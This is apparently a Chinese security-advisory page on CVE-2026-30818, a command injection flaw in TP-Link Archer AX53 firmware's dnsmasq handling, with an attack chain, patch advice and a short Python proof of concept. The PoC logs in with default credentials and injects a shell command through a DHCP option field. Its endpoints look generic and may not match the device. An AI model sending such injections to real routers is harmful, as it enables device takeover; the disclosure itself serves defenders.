CVE-2026-30818 CVSS 8.0 高危

CVE-2026-30818 TP-Link Archer AX53 OS命令注入漏洞

披露日期: 2026-04-08

来源: f23511db-6c3e-4e32-a477-6aa17d310630

漏洞信息

漏洞编号

CVE-2026-30818

漏洞类型

OS命令注入

CVSS评分

8.0 高危

攻击向量

邻接 (AV:A)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

TP-Link Archer AX53

漏洞概述

TP-Link Archer AX53 v1.0固件中的dnsmasq模块存在严重的操作系统命令注入漏洞。由于缺乏充分的输入验证机制，经过身份认证的邻接攻击者能够通过上传并处理特制的配置文件，在目标设备上执行任意操作系统命令。此漏洞可能导致攻击者完全控制设备，篡改配置，窃取敏感信息，并严重威胁系统的机密性、完整性和可用性。

技术细节

该漏洞根因在于TP-Link Archer AX53 v1.0固件集成的dnsmasq模块在解析配置文件时存在严重的输入验证缺陷。dnsmasq作为轻量级DNS转发和DHCP服务器，其配置处理逻辑未正确过滤特殊字符（如分号、反引号、管道符等），允许攻击者拼接并执行任意操作系统命令。攻击者需处于邻接网络环境并拥有低权限认证账户，通过Web管理接口或特定协议向设备注入包含恶意Shell指令的配置数据。当系统重新加载dnsmasq服务以应用更改时，注入的恶意命令将被操作系统内核执行。鉴于该服务通常以Root权限运行，攻击者可借此获得最高系统控制权，进而篡改路由规则、窃听网络流量或植入后门程序。

攻击链分析

STEP 1

侦察

攻击者扫描局域网，识别TP-Link Archer AX53设备及其固件版本。

STEP 2

获取访问权限

攻击者利用低权限账户（或弱口令）登录路由器的Web管理界面。

STEP 3

漏洞利用

攻击者在dnsmasq配置相关接口处注入特制的恶意字符串，构造包含系统命令分隔符的配置文件。

STEP 4

命令执行

设备处理特制配置文件并重启dnsmasq服务，由于未过滤输入，注入的恶意命令以Root权限在操作系统后台执行。

STEP 5

后渗透

攻击者获得Shell访问权限，修改系统配置，窃取敏感数据或建立持久化后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example, adjust based on actual device endpoint)
target_url = "http://192.168.0.1/cgi-bin/luci/admin/network/dhcp"

# Attacker credentials (Low privilege required)
username = "admin"
password = "admin"

# Malicious payload to inject OS command via dnsmasq config option
# This payload attempts to ping a controlled server to verify execution
# or could be replaced with a telnetd reverse shell payload
payload = "; ping -c 3 192.168.1.100 #"

data = {
    "dhcp_option": payload,
    "submit": "Save"
}

session = requests.Session()

# 1. Authenticate
login_data = {"luci_username": username, "luci_password": password}
session.post(target_url.replace("/dhcp", "/login"), data=login_data)

# 2. Send Exploit
try:
    response = session.post(target_url, data=data)
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check for command execution.")
    else:
        print(f"[-] Failed to send payload. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

TP-Link Archer AX53 v1.0 < 1.7.1 Build 20260213

防御指南

临时缓解措施

建议用户立即访问TP-Link官方网站下载并安装最新的修复固件。在无法立即升级的情况下，应严格限制局域网内用户的访问权限，避免不可信设备接入网络，并关闭远程管理功能以减少攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表